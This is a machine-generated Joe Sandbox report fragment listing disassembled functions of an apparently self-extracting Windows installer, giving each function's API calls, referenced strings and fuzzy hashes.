Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
Opcode Fuzzy Hash: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68

Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 004083C7
KillTimer.USER32(?,00000001), ref: 004083D8
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
SuspendThread.KERNEL32(00000298), ref: 0040841B
ResumeThread.KERNEL32(00000298), ref: 00408438
EndDialog.USER32(?,00000000), ref: 0040845A

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C

Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4

Strings

%%M\, xrefs: 00404058
%%M/, xrefs: 00404096

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
Opcode Fuzzy Hash: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88

Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E

Strings

%%T\, xrefs: 00403EE2
%%T/, xrefs: 00403F20

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
Opcode Fuzzy Hash: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98

Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029

Strings

%%S\, xrefs: 00403F9D
%%S/, xrefs: 00403FDB

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
Opcode Fuzzy Hash: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88

Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834

Strings

`lA, xrefs: 0040D7FC
XkA, xrefs: 0040D7B1
XkA, xrefs: 0040D7A3
xmA, xrefs: 0040D7AA
plA, xrefs: 0040D7F5
xmA, xrefs: 0040D7B8

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ExceptionThrow
String ID: XkA$XkA$`lA$plA$xmA$xmA
API String ID: 432778473-1797977924
Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99

Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

;!@Install@!UTF-8!, xrefs: 0040555E
;!@InstallEnd@!, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-372238525
Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401053
wsprintfW.USER32 ref: 00401071
lstrcatW.KERNEL32(?,?), ref: 00401084
ExitProcess.KERNEL32 ref: 004010AC

Strings

0x%p, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69

Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407DB6
SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
SHGetMalloc.SHELL32(00000000), ref: 00407E15

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Strings

A, xrefs: 00407DC8

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID: A
API String ID: 1557639607-3554254475
Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5

Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3

Strings

SetEnvironment, xrefs: 00402BB3, 00402BC2

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID: SetEnvironment
API String ID: 612612615-360490078
Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8

Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648

Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C

GetSystemMetrics.USER32(00000007), ref: 004080B4
GetSystemMetrics.USER32(00000007), ref: 004080C5
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C

Strings

100%% , xrefs: 004080E4, 004080EB, 00408144

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9

Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7

wsprintfW.USER32 ref: 00404F19
??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 00404F13
xcA, xrefs: 00404EB7

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X$xcA
API String ID: 1174869416-1550840741
Opcode ID: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
Opcode Fuzzy Hash: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C

Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
_wcsnicmp.MSVCRT ref: 0040423D

Strings

Mg@, xrefs: 00404224

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: lstrlen$_wcsnicmp
String ID: Mg@
API String ID: 2823567412-3680729969
Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5

Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
GetProcAddress.KERNEL32(00000000), ref: 004023CF

Strings

Wow64RevertWow64FsRedirection, xrefs: 004023BE
kernel32, xrefs: 004023C3

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C

Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
GetProcAddress.KERNEL32(00000000), ref: 00402401

Strings

Wow64DisableWow64FsRedirection, xrefs: 004023F0
kernel32, xrefs: 004023F5

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D

Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
memcpy.MSVCRT(00000000,00AAA638,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
??3@YAXPAX@Z.MSVCRT(00AAA638,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
Opcode Fuzzy Hash: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8

Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

